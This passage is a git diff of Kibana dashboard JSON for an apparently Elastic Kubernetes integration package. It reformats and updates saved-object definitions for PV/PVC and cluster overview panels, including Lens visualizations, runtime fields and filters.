"metrics-*", - "name": "e03df747-8a68-4d68-a958-1f0e38218859:2503a179-a67c-4db4-a091-84e1d54aa5a9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_4623b3fb-e2bc-4f1e-8cd3-0f0a753a171e:optionsListDataView", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_24514d41-0fa1-4fc5-96a1-6297453134bd:optionsListDataView", - "type": "index-pattern" + "b15e8116-d875-4e7f-97f5-448ab367e5e1": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Phase", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.persistentvolumeclaim.phase" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "2503a179-a67c-4db4-a091-84e1d54aa5a9", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.state_persistentvolume", + "kubernetes.state_persistentvolumeclaim" + ], + "type": "phrases", + "value": [ + "kubernetes.state_persistentvolume", + "kubernetes.state_persistentvolumeclaim" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_persistentvolume" + } + }, + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_persistentvolumeclaim" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "left", + "columnId": "7b08988e-0df9-450c-89d0-b1d71c49a7ec", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "b15e8116-d875-4e7f-97f5-448ab367e5e1", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "1398ca11-cb70-4d9d-bacf-b402bf000905", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "6f4b28cd-dd85-41da-9921-af5faf9f33f8", + "isTransposed": false + }, + { + "columnId": "457a059e-0824-4109-9178-6802eed70599", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "388ad9b8-3fec-4e8d-9a13-d950d646bd5b", + "isTransposed": false + } + ], + "layerId": "e8ede311-8955-4a16-bf44-8c0ff0e0104b", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "Persistent Volume Claims Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_16f1ca8d-0221-4df5-ae59-42a0e0f92992:optionsListDataView", - "type": "index-pattern" - } + "title": "Persistent Volume Claims Informations [Metrics Kubernetes]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] PV/PVC", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "e6032561-b325-41fe-b7f5-6b167d58dc18:indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e6032561-b325-41fe-b7f5-6b167d58dc18:1b2422f5-7bbd-4173-ae8f-17b87d3dbd29", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e03df747-8a68-4d68-a958-1f0e38218859:indexpattern-datasource-layer-e8ede311-8955-4a16-bf44-8c0ff0e0104b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e03df747-8a68-4d68-a958-1f0e38218859:2503a179-a67c-4db4-a091-84e1d54aa5a9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_4623b3fb-e2bc-4f1e-8cd3-0f0a753a171e:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_24514d41-0fa1-4fc5-96a1-6297453134bd:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_16f1ca8d-0221-4df5-ae59-42a0e0f92992:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c.json b/packages/kubernetes/kibana/dashboard/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c.json index f7781716d29..f95059fffbc 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c.json @@ -1,3237 +1,3312 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"748291db-2826-4242-9107-9a5226733a06\":{\"order\":0,\"width\":\"large\",\"grow\":false,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"748291db-2826-4242-9107-9a5226733a06\",\"enhancements\":{},\"selectedOptions\":[]}},\"2da8af79-7928-4741-8d03-866642f3c2a0\":{\"order\":1,\"width\":\"large\",\"grow\":false,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace\",\"id\":\"2da8af79-7928-4741-8d03-866642f3c2a0\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1NSwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"748291db-2826-4242-9107-9a5226733a06\":{\"order\":0,\"width\":\"large\",\"grow\":false,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"748291db-2826-4242-9107-9a5226733a06\",\"enhancements\":{},\"selectedOptions\":[]}},\"2da8af79-7928-4741-8d03-866642f3c2a0\":{\"order\":1,\"width\":\"large\",\"grow\":false,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace\",\"id\":\"2da8af79-7928-4741-8d03-866642f3c2a0\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Overview of Kubernetes cluster metrics", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "f1541205-b6eb-45a6-bdc5-9aaefa62af66", + "w": 33, + "x": 0, + "y": 0 }, - "description": "Overview of Kubernetes cluster metrics", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "f1541205-b6eb-45a6-bdc5-9aaefa62af66", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "ace0daf9-5db7-44e5-9fc3-a1b1976b01c2", + "w": 15, + "x": 33, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} + "panelIndex": "ace0daf9-5db7-44e5-9fc3-a1b1976b01c2", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 10, + "markdown": "This dashboard requires having [`kube-state-metrics`](https://github.com/kubernetes/kube-state-metrics#kubernetes-deployment) deployed to your Kubernetes cluster to function properly. \nCheck the **Section: state_\\* and event** of the [Elastic Kubernetes integration](https://docs.elastic.co/en/integrations/kubernetes).", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" + }, + "title": "Information" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "33530265-ff62-49e7-9518-f430efb0dde0", + "w": 8, + "x": 0, + "y": 4 + }, + "panelIndex": "33530265-ff62-49e7-9518-f430efb0dde0", + "embeddableConfig": { + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "0fa53a1e-0589-4380-b700-70dd489a33de": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "0fa53a1e-0589-4380-b700-70dd489a33de", + "name": "state-pods-adhoc", + "runtimeFieldMap": { + "failed": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "not_running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "pending": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" + }, + "type": "long" + }, + "running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" + }, + "type": "long" + }, + "succeeded": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" + }, + "type": "long" } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" }, - "gridData": { - "h": 4, - "i": "f1541205-b6eb-45a6-bdc5-9aaefa62af66", - "w": 33, - "x": 0, - "y": 0 - }, - "panelIndex": "f1541205-b6eb-45a6-bdc5-9aaefa62af66", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "31c14ad9-51fd-465c-957c-b0171c23a0bb": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "31c14ad9-51fd-465c-957c-b0171c23a0bb", + "name": "state_nodes", + "runtimeFieldMap": { + "nodes_not_ready": { + "script": { + "source": "if (doc['kubernetes.node.status.ready'].value == \"false\") { emit(1) }" + }, + "type": "long" + }, + "nodes_ready": { + "script": { + "source": "if (doc['kubernetes.node.status.ready'].value == \"true\") { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "b0224778-49e2-4916-aa97-55d3b4ddf6c1": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "b0224778-49e2-4916-aa97-55d3b4ddf6c1", + "name": "nodes-ad-hoc", + "runtimeFieldMap": { + "not_ready": { + "script": { + "source": "if (doc['kubernetes.node.status.ready'].value == false) { emit(1) }" + }, + "type": "long" + }, + "ready": { + "script": { + "source": "if (doc['kubernetes.node.status.ready'].value == true) { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "d1e9a0d9-4696-43cb-b9f1-a4b0b9fe3732": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "d1e9a0d9-4696-43cb-b9f1-a4b0b9fe3732", + "name": "state_node-ad-hoc", + "runtimeFieldMap": { + "not_ready": { + "script": { + "source": "if (doc['kubernetes.node.status.ready'].value == \"false\" || doc['kubernetes.node.status.ready'].value == \"unknown\") { emit(1) }" + }, + "type": "long" + }, + "ready": { + "script": { + "source": "if (doc['kubernetes.node.status.ready'].value == \"true\") { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", + "name": "daemonsets-ad-hoc", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "b7b25285-ced1-481d-999e-1886b3463594": { + "columnOrder": [ + "977fa7a0-b026-427b-8ffd-ee07fd69b50e", + "1b46f7a2-12d8-4773-87db-118234d45186", + "4314b1bf-95bb-477a-9708-ff7324356bda", + "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4" + ], + "columns": { + "1b46f7a2-12d8-4773-87db-118234d45186": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "" + }, + "label": "Status" + } + ] + }, + "scale": "ordinal" }, - "description": "", - "id": "", - "params": { - "fontSize": 10, - "markdown": "This dashboard requires having [`kube-state-metrics`](https://github.com/kubernetes/kube-state-metrics#kubernetes-deployment) deployed to your Kubernetes cluster to function properly. \nCheck the **Section: state_\\* and event** of the [Elastic Kubernetes integration](https://docs.elastic.co/en/integrations/kubernetes).", - "openLinksInNewTab": false + "4314b1bf-95bb-477a-9708-ff7324356bda": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "ready: *" + }, + "isBucketed": false, + "label": "Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "ready" }, - "title": "", - "type": "markdown", - "uiState": {} + "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "not_ready: *" + }, + "isBucketed": false, + "label": "Not Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "not_ready" + }, + "977fa7a0-b026-427b-8ffd-ee07fd69b50e": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "4314b1bf-95bb-477a-9708-ff7324356bda", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "31c14ad9-51fd-465c-957c-b0171c23a0bb", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_node" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" } + } + } + ], + "internalReferences": [ + { + "id": "d1e9a0d9-4696-43cb-b9f1-a4b0b9fe3732", + "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", + "type": "index-pattern" + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "4314b1bf-95bb-477a-9708-ff7324356bda", + "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4" + ], + "collapseFn": "sum", + "layerId": "b7b25285-ced1-481d-999e-1886b3463594", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "977fa7a0-b026-427b-8ffd-ee07fd69b50e", + "xAccessor": "1b46f7a2-12d8-4773-87db-118234d45186", + "yConfig": [ + { + "color": "#a63a38", + "forAccessor": "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4" + }, + { + "color": "#00bfb3", + "forAccessor": "4314b1bf-95bb-477a-9708-ff7324356bda" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false }, - "gridData": { - "h": 4, - "i": "ace0daf9-5db7-44e5-9fc3-a1b1976b01c2", - "w": 15, - "x": 33, - "y": 0 - }, - "panelIndex": "ace0daf9-5db7-44e5-9fc3-a1b1976b01c2", - "title": "Information", - "type": "visualization", - "version": "8.6.0-SNAPSHOT" + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [], - "state": { - "adHocDataViews": { - "0fa53a1e-0589-4380-b700-70dd489a33de": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "0fa53a1e-0589-4380-b700-70dd489a33de", - "name": "state-pods-adhoc", - "runtimeFieldMap": { - "failed": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "not_running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "pending": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" - }, - "type": "long" - }, - "running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" - }, - "type": "long" - }, - "succeeded": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "31c14ad9-51fd-465c-957c-b0171c23a0bb": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "31c14ad9-51fd-465c-957c-b0171c23a0bb", - "name": "state_nodes", - "runtimeFieldMap": { - "nodes_not_ready": { - "script": { - "source": "if (doc['kubernetes.node.status.ready'].value == \"false\") { emit(1) }" - }, - "type": "long" - }, - "nodes_ready": { - "script": { - "source": "if (doc['kubernetes.node.status.ready'].value == \"true\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "b0224778-49e2-4916-aa97-55d3b4ddf6c1": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "b0224778-49e2-4916-aa97-55d3b4ddf6c1", - "name": "nodes-ad-hoc", - "runtimeFieldMap": { - "not_ready": { - "script": { - "source": "if (doc['kubernetes.node.status.ready'].value == false) { emit(1) }" - }, - "type": "long" - }, - "ready": { - "script": { - "source": "if (doc['kubernetes.node.status.ready'].value == true) { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "d1e9a0d9-4696-43cb-b9f1-a4b0b9fe3732": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "d1e9a0d9-4696-43cb-b9f1-a4b0b9fe3732", - "name": "state_node-ad-hoc", - "runtimeFieldMap": { - "not_ready": { - "script": { - "source": "if (doc['kubernetes.node.status.ready'].value == \"false\" || doc['kubernetes.node.status.ready'].value == \"unknown\") { emit(1) }" - }, - "type": "long" - }, - "ready": { - "script": { - "source": "if (doc['kubernetes.node.status.ready'].value == \"true\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", - "name": "daemonsets-ad-hoc", - "runtimeFieldMap": {}, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - } + "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [] + } + }, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Nodes" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "d0fadeee-3c79-443b-bfcb-b70e78d168e9", + "w": 20, + "x": 28, + "y": 4 + }, + "panelIndex": "d0fadeee-3c79-443b-bfcb-b70e78d168e9", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c165f898-73a9-48b1-afa9-2b6e75f3cc1f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-dde29dcf-00ae-4b80-8d9e-ab45c51efba0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fbaf3405-fab6-4f09-883d-45368cf97670", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c165f898-73a9-48b1-afa9-2b6e75f3cc1f": { + "columnOrder": [ + "7113c7e7-1af9-4350-b5d2-57abcb60c633", + "af01f323-afc0-4b55-b453-8da15facfc28", + "830de93b-4051-4716-99e4-83d625a91288X0", + "830de93b-4051-4716-99e4-83d625a91288X1", + "830de93b-4051-4716-99e4-83d625a91288" + ], + "columns": { + "7113c7e7-1af9-4350-b5d2-57abcb60c633": { + "dataType": "string", + "isBucketed": true, + "label": "Top 100000 values of kubernetes.container.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "datasourceStates": { - "formBased": { - "layers": { - "b7b25285-ced1-481d-999e-1886b3463594": { - "columnOrder": [ - "977fa7a0-b026-427b-8ffd-ee07fd69b50e", - "1b46f7a2-12d8-4773-87db-118234d45186", - "4314b1bf-95bb-477a-9708-ff7324356bda", - "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4" - ], - "columns": { - "1b46f7a2-12d8-4773-87db-118234d45186": { - "dataType": "string", - "isBucketed": true, - "label": "Filters", - "operationType": "filters", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "" - }, - "label": "Status" - } - ] - }, - "scale": "ordinal" - }, - "4314b1bf-95bb-477a-9708-ff7324356bda": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "ready: *" - }, - "isBucketed": false, - "label": "Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "ready" - }, - "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "not_ready: *" - }, - "isBucketed": false, - "label": "Not Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "not_ready" - }, - "977fa7a0-b026-427b-8ffd-ee07fd69b50e": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "4314b1bf-95bb-477a-9708-ff7324356bda", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "31c14ad9-51fd-465c-957c-b0171c23a0bb", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - } - ], - "internalReferences": [ - { - "id": "d1e9a0d9-4696-43cb-b9f1-a4b0b9fe3732", - "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", - "type": "index-pattern" - } - ], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "4314b1bf-95bb-477a-9708-ff7324356bda", - "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4" - ], - "collapseFn": "sum", - "layerId": "b7b25285-ced1-481d-999e-1886b3463594", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "splitAccessor": "977fa7a0-b026-427b-8ffd-ee07fd69b50e", - "xAccessor": "1b46f7a2-12d8-4773-87db-118234d45186", - "yConfig": [ - { - "color": "#a63a38", - "forAccessor": "607cddcf-ff9a-46a5-b3d6-b6f268ead1e4" - }, - { - "color": "#00bfb3", - "forAccessor": "4314b1bf-95bb-477a-9708-ff7324356bda" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "xTitle": "", - "yTitle": "" + "secondaryFields": [], + "size": 100000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.container.name" + }, + "830de93b-4051-4716-99e4-83d625a91288": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset :\"kubernetes.container\" " + }, + "isBucketed": false, + "label": "Cores Used", + "operationType": "formula", + "params": { + "format": { + "id": "number" + }, + "formula": "last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", + "isFormulaBroken": false + }, + "references": [ + "830de93b-4051-4716-99e4-83d625a91288X1" + ], + "scale": 